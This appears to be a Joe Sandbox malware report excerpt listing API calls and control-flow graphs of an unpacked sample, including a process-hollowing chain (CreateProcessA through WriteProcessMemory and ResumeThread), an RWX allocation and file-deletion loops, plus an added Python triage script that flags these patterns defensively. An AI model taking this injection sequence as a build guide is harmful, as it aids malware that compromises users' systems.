                                                                                                                                                                          • Instruction Fuzzy Hash: EFF05E60988244A6EF413BB0884AF4D36B45F31705F04889CBA59E90D2CF30C6508E72
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Control-flow graph (1c1345-1c13ec): 1c1345 -> 1c1358 -> 1c1364 VirtualProtect -> 1c137c VirtualAlloc (self-loop) -> 1c1391 -> 1c139b call 1c0e7c -> 1c13ad VirtualProtect -> 1c13eb (return); 1c1345, 1c1358 and 1c1364 can each also branch directly to 1c13eb.
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 001C1372
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 001C1387
                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 001C13E5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: 24bdabae7abb68ff9a17f5ee70b33f63d9b304115b88680595e81b57cc4b6d8c
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: C921AE31944256AFDB11DE78C844B5DBBB5AF05310F054219F955BB5D5D730E800CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Control-flow graph: a single block 2413409-2413462 containing GetVolumeInformationA and a call to 2413634.
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVolumeInformationA.KERNELBASE(02413405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 02413409
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                          • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                          • Instruction ID: f1f5f59a51abdcf2a43967d54cb10672140bd40e096f884b3ee3f57d9bd504ea
                                                                                                                                                                          • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                          • Instruction Fuzzy Hash: 78F0F875A00154DBEF12EF24C485A9A7BF8AF84344F4508C9AA4DBF206CA30A599CFA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(02412949,00000008,?,00000000,02412835,00000000), ref: 02412956
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 02412993
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,024129C1), ref: 024129D0
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,024129F8), ref: 02412A07
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02412A2F), ref: 02412A3E
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AB8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AFC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02412B52
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02412B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction ID: 75c66eb54fa99e83cd6d10e9b9eb073483e129dbe3991202e78fb6292cb1427a
                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B518571500224AEDB22FF718D48FAB77BDEF40704F4404ABAE45EA045EF749680CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Control-flow graph (1c292d-1c2b48): 1c292d LoadLibraryA (calls 1c3653, 1c0c9c) -> 1c2948 -> 1c2961 VirtualAlloc (self-loop) -> 1c2979 (calls 1c25e8, 1c29a6) -> either 1c29a1 (two lstrcat calls; calls 1c3653, 1c25e8, 1c29dd, 1c2501, 1c2a14) or directly 1c2a07 lstrcat -> 1c2a20 (calls 1c2b4d, 1c34f7) <-> 1c2a48. From 1c2a48 a loop runs 1c2a51 (calls 1c343f, 1c2683) -> 1c2a71 (call 1c26f9) -> 1c2a8a DeleteFileA -> 1c2a9a (call 1c2683) -> 1c2ab5 (call 1c26f9) -> 1c2ace DeleteFileA -> 1c2ade (call 1c2683) -> 1c2af8 (call 1c2e97) -> 1c2b13 (call 1c3057) -> 1c2b1e DeleteFileA -> 1c2b34 Sleep -> back to 1c2a48; each DeleteFileA block is conditional and can be skipped.
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(001C2925,00000008,?,00000000,001C2811,00000000), ref: 001C2932
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 001C296F
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction ID: 5e20f8d1fd77fe1a3bbaf27d3d0f84e3a94bc46b39ba8ee9e7a75b819cd3b3af
                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction Fuzzy Hash: 55513471500264AFDB227B608D49FAB77BCEF60705F0444AEFA45EB056DB74DA80CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Control-flow graph (24109fd-2410b16): 24109fd CreateProcessA (call 2413677) -> 2410a12 GetThreadContext -> 2410a3a VirtualProtectEx -> 2410a65 DuplicateHandle -> 2410aa6 WriteProcessMemory -> 2410ad4 ResumeThread -> 2410ae5 Sleep, OpenMutexA, looping through 2410b0b until the function returns at 2410b15; each API block also branches to the common exit path 2410b10 (call 2410b17).
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,024109F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02410A04
                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 02410A2C
                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02410A57
                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,02415834,00000000,00000000,00000002), ref: 02410A9C
                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02410ACA
                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 02410ADA
                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 02410AEA
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02410B01
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction ID: d83fe3bac47f13b8a479bbac9cd74855ff78128466e49bd4477d16f3698b1552
                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction Fuzzy Hash: 213141316402149FEF225F50CC85BAA77B8BF04748F0805D5BE49FE1E9DBB09690CE64
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%
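The two entries above (the 32-byte PAGE_EXECUTE_READWRITE allocation at 1c1345 and the CreateProcessA / GetThreadContext / VirtualProtectEx / WriteProcessMemory / ResumeThread routine at 24109fd, repeated at 1c09d9) are the parts of this listing a triage analyst acts on. The script below is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses API lines in the report's own format, decodes the memory-protection and allocation constants, and flags an RWX allocation and the suspended-child patching chain. It assumes the argument positions follow the documented Win32 prototypes for VirtualAlloc, VirtualProtectEx and WriteProcessMemory (which line up with the listed values); CreateProcessA's stack words are not decoded because the sandbox prints raw stack contents and values such as E8FFFF1F do not line up with that prototype. The SAMPLE text is constructed from the lines printed above.

```python
"""Triage helper for Joe Sandbox 'APIs' listings.

Added example: not part of the report. Parses lines of the form
    • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 001C1387
decodes the constants relevant to injection triage and flags
  1. VirtualAlloc with PAGE_EXECUTE_READWRITE (an RWX region, e.g. a hook stub)
  2. CreateProcessA -> GetThreadContext -> VirtualProtectEx -> WriteProcessMemory
     -> ResumeThread, cross-checking the byte counts of the protect and write.
Assumption: argument positions follow the Win32 prototypes for VirtualAlloc,
VirtualProtectEx and WriteProcessMemory; CreateProcessA's raw stack words are
left undecoded.
"""
import re
from dataclasses import dataclass

# Constructed sample: API lines copied from two function entries in this report.
SAMPLE = """
• VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 001C1372
• VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 001C1387
• VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 001C13E5
• CreateProcessA.KERNEL32(00000000,024109F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02410A04
• GetThreadContext.KERNEL32(?,00000000), ref: 02410A2C
• VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02410A57
• DuplicateHandle.KERNEL32(000000FF,000000FF,?,02415834,00000000,00000000,00000002), ref: 02410A9C
• WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02410ACA
• ResumeThread.KERNEL32(?), ref: 02410ADA
• Sleep.KERNEL32(000003E8), ref: 02410AEA
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02410B01
"""

CALL_RE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")

PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
EXEC_PROT = {0x10, 0x20, 0x40, 0x80}  # any PAGE_EXECUTE* value


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # raw hex strings; "?" where the sandbox could not resolve a value
    ref: int     # address of the call site


def parse_api_lines(text: str) -> list:
    """Extract every '<api>.<module>(<args>), ref: <addr>' record from the listing."""
    return [ApiCall(name, mod, [a.strip() for a in raw.split(",")], int(ref, 16))
            for name, mod, raw, ref in CALL_RE.findall(text)]


def arg_int(call: ApiCall, idx: int):
    """Argument idx as an int, or None when it is missing or printed as '?'."""
    if idx >= len(call.args) or call.args[idx] == "?":
        return None
    return int(call.args[idx], 16)


def decode_mem_flags(value) -> str:
    if value is None:
        return "?"
    names = [n for bit, n in MEM_FLAGS.items() if value & bit]
    return "|".join(names) if names else hex(value)


def find_rwx_allocations(calls: list) -> list:
    """VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect) with flProtect == 0x40."""
    return [{"ref": c.ref, "size": arg_int(c, 1),
             "alloc": decode_mem_flags(arg_int(c, 2)), "protect": PAGE_PROT[0x40]}
            for c in calls if c.name == "VirtualAlloc" and arg_int(c, 3) == 0x40]


INJECTION_CHAIN = ("CreateProcessA", "GetThreadContext", "VirtualProtectEx",
                   "WriteProcessMemory", "ResumeThread")


def find_injection_chain(calls: list):
    """Return details if the chain occurs in order, else None.

    Compares VirtualProtectEx(hProcess, lpAddress, dwSize, flNewProtect, ...)
    with WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, ...):
    an equal byte count plus an executable protection means the child's code
    was patched in place before its initial thread was resumed.
    """
    names = [c.name for c in calls]
    hits, pos = [], 0
    for want in INJECTION_CHAIN:
        if want not in names[pos:]:
            return None
        pos = names.index(want, pos)
        hits.append(calls[pos])
        pos += 1
    create, _ctx, protect, write, _resume = hits
    prot = arg_int(protect, 3)
    return {
        "create_ref": create.ref,
        "patch_size": arg_int(protect, 2),
        "write_size": arg_int(write, 3),
        "protect": PAGE_PROT.get(prot, hex(prot) if prot is not None else "?"),
        "executable": prot in EXEC_PROT,
        "sizes_match": arg_int(protect, 2) == arg_int(write, 3),
    }


def triage(text: str) -> dict:
    calls = parse_api_lines(text)
    return {"calls": len(calls), "rwx_allocs": find_rwx_allocations(calls),
            "injection": find_injection_chain(calls)}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
```

On the sample above the script reports one RWX allocation of 0x20 bytes (MEM_COMMIT|MEM_RESERVE) at 001C1387 and an injection chain starting at 02410A04 that makes 0xEB bytes executable and writes exactly 0xEB bytes before resuming the thread. The chain matcher requires the five APIs in order within one function's listing, so the same detection can be pointed at the 1c09d9 copy of the routine.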

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Control-flow graph (1c09d9-1c0af2): 1c09d9 CreateProcessA (call 1c3653) -> 1c09ee GetThreadContext -> 1c0a16 VirtualProtectEx -> 1c0a3c DuplicateHandle -> 1c0a82 WriteProcessMemory -> 1c0ab0 ResumeThread -> 1c0ac1 Sleep, OpenMutexA, looping through 1c0ae7 until the function returns at 1c0af1; each API block also branches to the common exit path 1c0aec (call 1c0af3).
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction ID: d08d0b8b2051c34f5721e4dda066ff8a6639c36971b334a2f4be7756b07d5326
                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction Fuzzy Hash: F0312F31640215AFEF239F14CC85FAA77B8AF14744F080199AA49FE0E5DBB0DA90CE54
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• lstrcat.KERNEL32(00000000,024129C1), ref: 024129D0
  • Part of subcall function 02412A01: lstrcat.KERNEL32(00000000,024129F8), ref: 02412A07
  • Part of subcall function 02412A01: lstrcat.KERNEL32(00000000,02412A2F), ref: 02412A3E
  • Part of subcall function 02412A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AB8
  • Part of subcall function 02412A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02412B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02412B66
Memory Dump Source
• Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2410000_bin.jbxd
Similarity
• API ID: DeleteFilelstrcat$Sleep
• String ID:
• API String ID: 588723932-0
• Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
• Instruction ID: c17460d5d5ae24aa734a8021d29e5248295317fa7bfea61926b70e992cd516a4
• Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
• Instruction Fuzzy Hash: EC414371400668AEDB22EF718D48FAF77BDEF40704F4044ABAE85EA055DB749680CEA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Nodes (id: address range, calls):
• 716: 1c29a6-1c2a1a, call 1c3653, lstrcat, call 1c25e8, call 1c29dd, call 1c3653, lstrcat, call 1c2501, call 1c2a14, call 1c3653, lstrcat
• 733: 1c2a20-1c2a43, call 1c2b4d, call 1c34f7
• 737: 1c2a48-1c2a4f
• 738: 1c2a51-1c2a6d, call 1c343f, call 1c2683
• 743: 1c2a6f
• 744: 1c2a9a-1c2ab1, call 1c2683
• 746: 1c2a71-1c2a86, call 1c26f9
• 749: 1c2ade-1c2af5, call 1c2683
• 750: 1c2ab3
• 752: 1c2ab5-1c2aca, call 1c26f9
• 754: 1c2a88
• 755: 1c2a8a-1c2a94, DeleteFileA
• 759: 1c2af8-1c2b11, call 1c2e97
• 760: 1c2af7
• 761: 1c2acc
• 764: 1c2ace-1c2ad8, DeleteFileA
• 765: 1c2b34-1c2b48, Sleep
• 766: 1c2b13-1c2b1c, call 1c3057
• 769: 1c2b1e-1c2b2e, DeleteFileA
Edges:
• 716->733, 733->737, 737->733, 737->738, 738->743, 738->744, 743->744, 743->746, 744->749, 744->750, 746->744, 746->754, 749->759, 749->760, 750->749, 750->752, 752->749, 752->761, 754->744, 754->755, 755->744, 759->765, 759->766, 760->759, 761->749, 761->764, 764->749, 765->737, 766->765, 766->769, 769->765
APIs
• lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
Similarity
• API ID: DeleteFilelstrcat$Sleep
• String ID:
• API String ID: 588723932-0
• Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
• Instruction ID: c636e14730fe7c8789ea0b8b2e66408bc148dc9e268f550b67392472ade30f33
• Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
• Instruction Fuzzy Hash: 9441F1715002289FDB22BB618D49FAB77BCEF60705F0444AAEA45E7055DB74DA80CEA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Nodes (id: address range, calls):
• 871: 2412a01-2412a3e, call 2413677, lstrcat, call 2412525, call 2412a38, call 2413677, lstrcat
• 881: 2412a44-2412a67, call 2412b71, call 241351b
• 885: 2412a6c-2412a73
• 886: 2412a75-2412a91, call 2413463, call 24126a7
• 891: 2412a93
• 892: 2412abe-2412ad5, call 24126a7
• 893: 2412a95-2412aaa, call 241271d
• 898: 2412b02-2412b19, call 24126a7
• 899: 2412ad7
• 901: 2412aac
• 902: 2412ad9-2412aee, call 241271d
• 904: 2412aae-2412ab8, DeleteFileA
• 906: 2412b1b
• 907: 2412b1c-2412b35, call 2412ebb
• 910: 2412af0
• 912: 2412af2-2412afc, DeleteFileA
• 913: 2412b37-2412b40, call 241307b
• 914: 2412b58-2412b6c, Sleep
• 917: 2412b42-2412b52, DeleteFileA
Edges:
• 871->881, 881->885, 885->881, 885->886, 886->891, 886->892, 891->892, 891->893, 892->898, 892->899, 893->892, 893->901, 898->906, 898->907, 899->898, 899->902, 901->892, 901->904, 902->898, 902->910, 904->892, 906->907, 907->913, 907->914, 910->898, 910->912, 912->898, 913->914, 913->917, 914->885, 917->914
APIs
• lstrcat.KERNEL32(00000000,024129F8), ref: 02412A07
  • Part of subcall function 02412A38: lstrcat.KERNEL32(00000000,02412A2F), ref: 02412A3E
  • Part of subcall function 02412A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AB8
  • Part of subcall function 02412A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AFC
  • Part of subcall function 02412A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02412B52
  • Part of subcall function 02412A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02412B66
Memory Dump Source
• Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2410000_bin.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
• Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction ID: 3f90eb25eaba5dca63557f0aee667ca7c31998d0b46c408c811760b3e6b8fd4b
• Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction Fuzzy Hash: 9E4135714006689EDB22EF71CD48FAF77BDEF40709F4044ABAE85EA054DB749680CEA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Nodes (id: address range, calls):
• 824: 1c29dd-1c2a1a, call 1c3653, lstrcat, call 1c2501, call 1c2a14, call 1c3653, lstrcat
• 834: 1c2a20-1c2a43, call 1c2b4d, call 1c34f7
• 838: 1c2a48-1c2a4f
• 839: 1c2a51-1c2a6d, call 1c343f, call 1c2683
• 844: 1c2a6f
• 845: 1c2a9a-1c2ab1, call 1c2683
• 847: 1c2a71-1c2a86, call 1c26f9
• 850: 1c2ade-1c2af5, call 1c2683
• 851: 1c2ab3
• 853: 1c2ab5-1c2aca, call 1c26f9
• 855: 1c2a88
• 856: 1c2a8a-1c2a94, DeleteFileA
• 860: 1c2af8-1c2b11, call 1c2e97
• 861: 1c2af7
• 862: 1c2acc
• 865: 1c2ace-1c2ad8, DeleteFileA
• 866: 1c2b34-1c2b48, Sleep
• 867: 1c2b13-1c2b1c, call 1c3057
• 870: 1c2b1e-1c2b2e, DeleteFileA
Edges:
• 824->834, 834->838, 838->834, 838->839, 839->844, 839->845, 844->845, 844->847, 845->850, 845->851, 847->845, 847->855, 850->860, 850->861, 851->850, 851->853, 853->850, 853->862, 855->845, 855->856, 856->845, 860->866, 860->867, 861->860, 862->850, 862->865, 865->850, 866->838, 867->866, 867->870, 870->866
APIs
• lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
  • Part of subcall function 001C2A14: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
  • Part of subcall function 001C2A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
• Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction ID: d6b160bcfa924dc1f1ce780805323c99afb8a852cbc58ab7edcbb3794eecdb08
